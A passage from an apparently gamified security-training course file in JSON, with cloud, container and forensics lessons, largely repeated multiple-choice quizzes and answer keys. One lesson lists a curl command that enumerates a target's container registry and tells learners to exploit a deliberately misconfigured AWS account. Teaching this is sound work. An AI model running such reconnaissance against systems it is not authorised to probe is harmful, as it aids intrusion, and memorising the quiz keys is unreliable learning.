orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-registry","cat":"Cloud & Container","title":"Container Registry Security","diff":2,"xp":150,"intro":"Secure container image registries.","sections":[{"type":"text","content":"Secure container image registries."},{"type":"code","lang":"bash","content":"# Check for public registry\ncurl https://registry.target.com/v2/_catalog\n# Inspect image layers for secrets\ndocker history --no-trunc image:latest\ndive image:latest"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Public registries leak...","opts":["Nothing","Source code, secrets, and application internals","Only metadata","Network config"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-service-mesh","cat":"Cloud & Container","title":"Service Mesh Security","diff":3,"xp":200,"intro":"mTLS between services with Istio/Linkerd.","sections":[{"type":"text","content":"mTLS between services with Istio/Linkerd."},{"type":"code","lang":"bash","content":"# Istio: enforce mTLS\napiVersion: security.istio.io/v1beta1\nkind: PeerAuthentication\nspec:\n  mtls:\n    mode: STRICT"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Service mesh provides...","opts":["Load balancing only","mTLS and authorization between microservices","DNS only","Container orchestration"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-opa","cat":"Cloud & Container","title":"OPA/Gatekeeper Policy Enforcement","diff":3,"xp":200,"intro":"Enforce security policies in Kubernetes.","sections":[{"type":"text","content":"Enforce security policies in Kubernetes."},{"type":"code","lang":"bash","content":"# OPA Gatekeeper prevents:\n# - Privileged containers\n# - Containers running as root\n# - Host networking\n# - Missing resource limits\nkubectl get constraints"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"OPA Gatekeeper enforces...","opts":["Network policies","Security policies on K8s resources","IAM policies","Storage policies"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-crossplane","cat":"Cloud & Container","title":"Cross-Cloud Security","diff":4,"xp":250,"intro":"Security considerations for multi-cloud deployments.","sections":[{"type":"text","content":"Security considerations for multi-cloud deployments."},{"type":"code","lang":"bash","content":"# Multi-cloud challenges:\n# - Different IAM models (AWS vs Azure vs GCP)\n# - Different security controls\n# - Consistent policy enforcement\n# - Centralized logging across clouds\n# Tools: Prisma Cloud, Orca, Wiz"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Multi-cloud security is harder because...","opts":["It's slower","Each provider has different security models and controls","It costs more","It uses more storage"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cl-supply-chain2","cat":"Cloud & Container","title":"Software Supply Chain Security","diff":4,"xp":250,"intro":"Secure the build pipeline and dependencies.","sections":[{"type":"text","content":"Secure the build pipeline and dependencies."},{"type":"code","lang":"bash","content":"# Sign images: cosign\ncosign sign image@sha256:digest\n# Verify signatures\ncosign verify image@sha256:digest\n# SBOM generation\nsyft image:latest -o spdx\n# Scan SBOM for vulns\ngrype sbom:./sbom.spdx"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Supply chain security starts with...","opts":["Runtime monitoring","Signing, verifying, and scanning images and dependencies","Network isolation","User training"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"fo-ntfs2","cat":"Forensics & IR","title":"NTFS File System Forensics","diff":3,"xp":200,"intro":"Master NTFS artifacts: MFT, USN, ADS.","sections":[{"type":"text","content":"Master NTFS artifacts: MFT, USN, ADS."},{"type":"code","lang":"bash","content":"MFTECmd.exe -f $MFT --csv output\n# USN Journal: file change tracking\n# Alternate Data Streams: hidden data within files\ndir /r file.txt  # shows ADS"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Alternate Data Streams hide data by...","opts":["Encrypting files","Attaching data to existing files invisibly","Compressing files","Deleting files"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-srum","cat":"Forensics & IR","title":"SRUM Analysis","diff":3,"xp":200,"intro":"System Resource Usage Monitor tracks app network usage.","sections":[{"type":"text","content":"System Resource Usage Monitor tracks app network usage."},{"type":"code","lang":"bash","content":"# SRUM database: C:WindowsSystem32sruSRUDB.dat\n# Tracks: network usage, CPU time, bytes sent/received per app\n# Survives log clearing\npython3 srum_dump.py -i SRUDB.dat -t SOFTWARE -o output.xlsx"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"SRUM survives log clearing because...","opts":["It's encrypted","It's a separate database not affected by event log operations","It's in memory","It's compressed"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-amcache","cat":"Forensics & IR","title":"Amcache Forensics","diff":2,"xp":150,"intro":"Prove program execution with SHA1 hashes.","sections":[{"type":"text","content":"Prove program execution with SHA1 hashes."},{"type":"code","lang":"bash","content":"AmcacheParser.exe -f Amcache.hve --csv output\n# Records: file path, SHA1, first execution time, publisher"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Amcache uniquely provides...","opts":["Network connections","SHA1 hashes of executed programs","User passwords","Registry changes"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in 